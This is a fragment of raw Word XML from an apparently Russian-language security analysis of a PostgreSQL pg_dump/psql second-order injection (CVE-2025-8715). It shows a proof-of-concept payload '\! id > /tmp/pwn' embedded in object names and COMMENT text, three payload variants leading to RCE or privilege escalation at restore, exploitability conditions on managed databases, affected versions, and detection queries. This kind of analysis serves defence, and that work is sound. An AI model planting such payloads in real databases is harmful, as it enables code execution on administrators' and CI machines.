        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">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RAISE NOTICE 'normal';</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COMMENT ON FUNCTION public.innocent_func() IS 'Innocent function</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\! id &gt; /tmp/pwn</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сериализует COMMENT:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">COMMENT ON FUNCTION public.innocent_func() IS 'Innocent function</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\! id &gt; /tmp/pwn</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quoting-функция должна экранировать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внутри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До CVE-2025-8715 fix, escape был неполным для некоторых encoded-форм; payload в COMMENT-тексте разрывал dump-script. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Детальный mechanism — в 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Что произойдёт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A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RCE на host, где запущен psql (DBA-машина, CI-runner)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meta-command. Может быть exfiltration, persistence, lateral movement в инфраструктуре.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B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SQL injection при restore — атакующий выполняет SUPERUSER-GRANT, CREATE EXTENSION, и т.д.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Payload C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — RCE через COMMENT-payload, активируется при restore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Все три варианта — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">second-order injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: setup в одном месте/времени, активация в другом. Это критическое отличие от обычной SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Почему этот приём проходит фильтр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CREATE-time validation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не валидирует имена объектов перед dump-ом (cчитает их already-validated на CREATE-стадии).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CREATE-time валидация в PG core</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — quoted-identifier допускает любые байты по spec. PG не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">rejects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> newline-в-имени; это считается valid.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Restore-time валидация</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-restore-парсер trust-ит dump-script (DBA в позиции trust). Никакого WAF/sanitizer-а между.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pg_dump fix CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — escape-логика для имён в comment-блоках. R25 показал, что fix был неполный для специфичных edge cases (Unicode, format-string, COMMENT-тексты).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Почему PostgreSQL принимает результат как валидный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Quoted-identifier semantics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"any.bytes.except.null"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — valid identifier. Документация §4.1.1.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pg_dump-comment generation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: pg_dump пишет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Name: &lt;object_name&gt;; Type: ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> перед каждым CREATE. Имя берётся as-is (с escape для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но не для newline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-комментарии до CVE-2012-0868 fix).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psql `\!`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — meta-command, документирован в psql Reference. Не SQL-команда; обрабатывается клиентским psql-CLI, не сервером.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CVE-2012-0868 + CVE-2025-8715</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: full chain в official PG advisory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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до 17.6, 16.10, 15.14, 14.19, 13.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — уязвим к R25 (CVE-2025-8715).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 (setup)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: атакующий с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 на любой схеме. На multi-tenant managed PG (RDS, Cloud SQL) — application-роль обычно имеет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собственной user-schema → setup-возможен.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Привилегии (активация)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: DBA / CI-system, запускающий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psql -f restore.sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Атакующий не контролирует эту часть; ждёт legitimate-операции backup/restore.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Managed-провайдеры</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: на RDS/Cloud SQL/Supabase pg_dump запускается DBA вручную или через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">aws rds export-cluster-to-s3</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gcloud sql export sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если export-механика провайдера использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_dump --format=plain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и потом psql-restore — уязвимы. Если pg_restore-binary — Payload A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 работает, но Payload B/C могут.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Никакого легитимного use case для newline в identifier-е. PostgreSQL допускает это исторически (потому что quoted-identifier должен быть transparent для имён), но в практике application/admin-кода </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">никогда не нужен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Любая запись в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_class.relname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pg_authid.rolname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с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 индикатор атаки (или баг в migration-tool).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Маркеры: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`pg_authid`/`pg_class`/`pg_namespace`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имена с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chr(10)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chr(13)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в составе — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT rolname FROM pg_authid WHERE position(chr(10) IN rolname) &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — найти все объекты с newline-в-имени.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pg_dump output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: если dump-script содержит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\copy</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\connect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в начале блока (то есть после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Name:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> префикса) — индикатор payload-injection.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Audit-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: events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 с literal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chr(10)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chr(13)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в имени — должны бить тревогу.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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Patched в 17.6, 16.10, 15.14, 14.19, 13.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (август 2025).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Уязвимые версии</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: всё до этих minor. На production-кластерах с lag в patching — типично 14.x/15.x/16.x.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Managed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: AWS RDS / Cloud SQL — патчи применяются в maintenance windows; opt-out возможен. Supabase — auto-update.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Регрессия CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — оригинал был в 2012; fix был частичный, R25 закрыл missing cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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FROM/TO PROGRAM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернатива RCE при наличии прямого SQL-injection. 3.12.3 — RCE через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">client-side `\!`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в psql, не через server-side COPY PROGRAM.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3.9.7 (CVE-2025-1094 в libpq escape)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — другой класс client-side bug: 1094 — в libpq escape-функциях; 8715 — в pg_dump quoting. Оба chain-ятся через psql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3.12.2 (`--` и CR/LF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — server-side counterpart. 3.12.2 — про newline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-параметре HTTP-запроса; 3.12.3 — про newline в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG object name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, который потом сериализуется в dump.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 (Privilege escalation)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 3.12.3 setup может требовать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 (через 3.13.1 — SET ROLE) или CREATE TABLE (через 3.13.2 — schema_element).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пересекается на server-side через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%I', value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без proper-quoting. 3.16 — runtime server; 3.12.3 — pg_dump-time client.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 — полный разбор CVE-2025-8715: timeline disclosure, exact bug, patch-окно, цепочка с CVE-2025-1094.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rules.py в DS-workshop2.0 — не покрыто и сложно покрыть:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
